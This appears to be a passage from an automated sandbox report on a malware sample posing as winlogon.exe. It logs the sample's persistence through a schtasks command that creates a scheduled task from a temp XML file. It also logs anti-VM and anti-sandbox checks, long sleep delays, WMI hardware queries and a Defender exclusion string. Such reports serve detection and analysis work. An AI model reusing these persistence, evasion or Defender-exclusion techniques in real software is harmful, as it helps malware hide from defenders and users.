                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\winlogon.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UlhpAjSuVoTa" /XML "C:\Users\user\AppData\Local\Temp\tmpD7F1.tmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 0.2.winlogon.exe.2bf1b4c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: winlogon.exe PID: 6768, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: winlogon.exe, 00000000.00000002.676484155.0000000002CB3000.00000004.00000001.sdmp, winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\winlogon.exe TID: 2460Thread sleep time: -36574s >= -30000s
                      Source: C:\Users\user\Desktop\winlogon.exe TID: 6912Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6344Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\winlogon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6184
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7653
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\winlogon.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\winlogon.exeThread delayed: delay time: 36574
                      Source: C:\Users\user\Desktop\winlogon.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: RegSvcs.exe, 00000006.00000002.929777054.0000000005B17000.00000004.00000001.sdmp, RegSvcs.exe, 00000006.00000003.875278823.0000000005B58000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
                      Source: winlogon.exe, 00000000.00000002.676341483.0000000002BD1000.00000004.00000001.sdmpBinary or memory string: vmware
